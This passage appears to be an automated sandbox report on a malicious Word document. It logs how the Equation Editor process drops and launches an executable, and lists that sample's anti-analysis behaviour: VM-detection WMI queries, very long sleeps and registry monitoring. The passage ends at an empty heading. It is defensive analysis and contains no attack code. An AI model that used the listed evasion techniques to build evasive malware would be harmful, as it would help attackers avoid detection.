Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: Pending Orders Statement -40064778.doc	Virustotal: Detection: 41%
Source: Pending Orders Statement -40064778.doc	ReversingLabs: Detection: 47%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: Symwriter.pdb source: poiuytrewsdfghjklmnbvcx.exe
Source:	Binary string: .soap.pdb source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
Source:	Binary string: Symwriter.pdb!CorSymWriter_SxS;..\v1.1.4322\diasymreader.dllI00000000-0000-0000-C000-000000000046 source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Window / User API: threadDelayed 9698

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2508	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2304	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2784	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2812	Thread sleep time: -3689348814741908s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2812	Thread sleep time: -120000s >= -30000s			Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Queries a list of all running processes

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

